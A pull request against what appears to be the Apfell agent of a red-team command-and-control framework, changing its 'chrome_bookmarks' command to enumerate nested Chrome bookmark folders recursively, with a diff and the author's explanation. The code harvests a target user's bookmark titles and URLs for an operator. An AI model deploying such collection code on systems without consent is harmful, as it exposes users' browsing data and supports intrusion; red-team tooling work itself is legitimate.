### PR TITLE
Chrome bookmarks - nested bookmarks directories fix

### DIFF
--- a/Payload_Types/apfell/agent_code/chrome_bookmarks.js
+++ b/Payload_Types/apfell/agent_code/chrome_bookmarks.js
@@ -6,15 +6,8 @@ exports.chrome_bookmarks = function(task, command, params){
             let folders = ch.bookmarkFolders;
             for (let i = 0; i < folders.length; i ++){
                 let folder = folders[i];
-                let bookmarks = folder.bookmarkItems;
-                all_data.push("Folder Name: " + folder.title());
-                for (let j = 0; j < bookmarks.length; j++){
-                    let info = "Title: " + bookmarks[j].title() +
-                    "\nURL: " + bookmarks[j].url() +
-                    "\nindex: " + bookmarks[j].index() +
-                    "\nFolder/bookmark: " + i + "/" + j;
-                    all_data.push(info); //populate our array
-                }
+                // we are using the fact that JS passes arrays by reference here to pass a reference to all_data
+                chrome_bookmarks_enum_folder(folder, all_data);
             }
         }
         else{
@@ -28,4 +21,34 @@ exports.chrome_bookmarks = function(task, command, params){
 		return {"user_output":err, "completed": true, "status": "error"};
 	}
 	return {"user_output": all_data, "completed": true};
+};
+
+let chrome_bookmarks_enum_folder = function(folder, all_data, folderPath = ""){
+
+    // for each folder under our current bookmark folder - call chrome_bookmarks_enum_folder
+    for (let i = 0; i < folder.bookmarkFolders.length; i++){
+        chrome_bookmarks_enum_folder(folder.bookmarkFolders[i], all_data, folderPath + folder.title() + "/");
+    }
+
+    // once we are done with folders, let's work on the bookmarkd items
+    chrome_bookmarks_enum_itmes(folder, all_data, folderPath);
+
+};
+
+let chrome_bookmarks_enum_itmes = function(folder, all_data, folderPath){
+    let bookmarks = folder.bookmarkItems;
+    
+    all_data.push("Folder Name: " + folderPath + folder.title());
+    
+    for (let j = 0; j < bookmarks.length; j++){
+        
+        let info = "Title: " + bookmarks[j].title() +
+        "\nURL: " + bookmarks[j].url() +
+        "\nindex: " + bookmarks[j].index() +
+        // note i'm using folder.index() here since each folder has a unique index within each parent container
+        // this will result in multiple folders with the same index if they are members of different folders
+        "\nFolder/bookmark: " + folder.index() + "/" + j;
+        all_data.push(info); //populate our array
+    }
+
 };


### PR DESCRIPTION
I noticed that `chrome_bookmarks` command didn't handle nested bookmarks directories properly so decided to fix that. 

See below with comparison before and after.
![image](https://user-images.githubusercontent.com/41267859/113497526-0fdbb780-94d3-11eb-8800-3da3cb3c94c3.png)

Note: there is a potential issue with printing "Folder/bookmark" (old line 15, new line 50). Originally we used var `i` for the folder but now it's inaccessible to us due to the function scope so I'm using `folder.index()` instead. This creates a minor issue where we may have several dirs with the same index (e.g.: `Dir1/DirA/` can have index 1 and `Dir2/DirA/` can be 1 as well since the parent dir is different. This doesn't impact the functionality, but more of a presentation layer concern.